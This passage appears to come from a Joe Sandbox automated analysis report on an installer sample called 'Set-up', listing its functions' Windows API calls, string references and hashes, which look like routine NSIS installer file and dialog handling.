Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

N, xrefs: 00404C06
, xrefs: 00404F39
M, xrefs: 00404B43
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@rD, xrefs: 00404610
82D, xrefs: 004046DB
A, xrefs: 00404636
@%F, xrefs: 00404674

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile("%s"), xrefs: 00406DBC

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
